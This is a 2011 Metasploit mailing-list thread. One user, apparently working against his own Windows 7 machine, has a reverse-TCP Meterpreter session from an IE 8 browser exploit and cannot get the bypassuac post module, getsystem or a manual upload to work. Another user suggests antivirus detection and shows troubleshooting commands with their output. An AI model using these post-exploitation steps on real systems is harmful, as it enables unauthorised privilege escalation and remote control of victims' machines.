Metasploit mailing list archives
Re: BypassUAC not working against Windows 7 x86
From: firstname lastname <psykosonik_frequenz () yahoo com>
Date: Sun, 4 Dec 2011 02:57:52 -0800 (PST)
Ok, I have not tried that already.

Yes, I have a reverse_tcp meterpreter shell. I am able to run a set of commands like getuid, sysinfo and stuff. However, commands like sniffer_start and upload do not work for me.

So, here's what I did to manually upload the bypassuac-x86.exe to the Windows 7 Target Machine.

    meterpreter > upload data/post/bypassuac-x86.exe C:\\Users\\Neon\\Desktop
    [*] uploading : data/post/bypassuac-x86.exe -> C:\Users\Neon\Desktop
    [-] core_channel_open: Operation failed: Access is denied.

What's wrong with this?

I have given the sysinfo and getuid output in my previous post already. Please let me know if you need more details to be able to troubleshoot this.

Regards,
NeonFlash

________________________________
From: Drforbin <drforbin6 () gmail com>
To: firstname lastname <psykosonik_frequenz () yahoo com>; framework () spool metasploit com
Sent: Sunday, December 4, 2011 1:50 PM
Subject: Re: [framework] BypassUAC not working against Windows 7 x86

Sorry about missing the last part...

Have you tried manually uploading to make sure uploading works? The firewall stuff is not important because you have a meterpreter session. You're using reverse_tcp, I assume?

It should try and upload bypassuac-x64.exe or bypassuac-x86.exe and a meterpreter exe. The file names will be randomized.

drforbin

On 12/04/2011 03:09 AM, firstname lastname wrote:

I guess you missed my note at the end of my post, which says that there is no sort of AV running on the target machine.

I even captured the network traffic while the exploit was run and the bypassuac script was executed. There was no executable present in the PCAP file either. There were files only specific to the Browser Exploit.

Regards,
NeonFlash

________________________________
From: Drforbin <drforbin6 () gmail com>
To: firstname lastname <psykosonik_frequenz () yahoo com>
Cc: framework () spool metasploit com
Sent: Sunday, December 4, 2011 10:21 AM
Subject: Re: [framework] BypassUAC not working against Windows 7 x86

I think what is happening is the AV is finding the meterpreter shellcode executable which bypassuac uploads to the system... I had this same issue and tracked it down to this. Metasploit executables, even when encoded, can be found pretty easily by some AV software.

drforbin.

I hope this helps... let me know.

On 12/03/2011 11:00 PM, firstname lastname wrote:

I am trying to gain Local System Privileges on a Windows 7 x86 target system.

I have a meterpreter reverse tcp shell on the victim's machine after a successful browser exploit on MSIE version 8.0 running on the target machine.

sysinfo output:

    Computer : Neon-PC
    OS : Windows 7 (Build 7601, Service Pack 1).
    Architecture : x86
    System Language : en_US
    Meterpreter : x86/win32

getuid output:

    Server username: Neon-PC\Neon

Next I run the bypass uac script as follows:

    use post/windows/escalate/bypassuac

Output:

    [*] Started reverse handler on 192.168.2.6:4444
    [*] Starting the payload handler...
    [*] Uploading the bypass UAC executable to the filesystem...
    [*] Meterpreter stager executable 73802 bytes long being uploaded..
    [*] Uploaded the agent to the filesystem....

Next, when I type in getsystem, I still get the error as:

    priv_elevate_getsystem: Operation failed: Access is denied.

I have gone through the ruby script, bypassuac.rb, and it looks like it's executing properly till the end. As a last step, after uploading the UAC bypass agent to the target machine, it has to execute it. But it looks like that is not happening.

I even checked the %temp% directory on the target Windows Machine for the presence of any exe and did not find one.

Any help here would be appreciated.

PS: I have disabled Windows 7 Firewall as well, just in case that would be blocking any transfer of file. Also, there's no third party antivirus installed on the target machine.

Regards,
NeonFlash

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework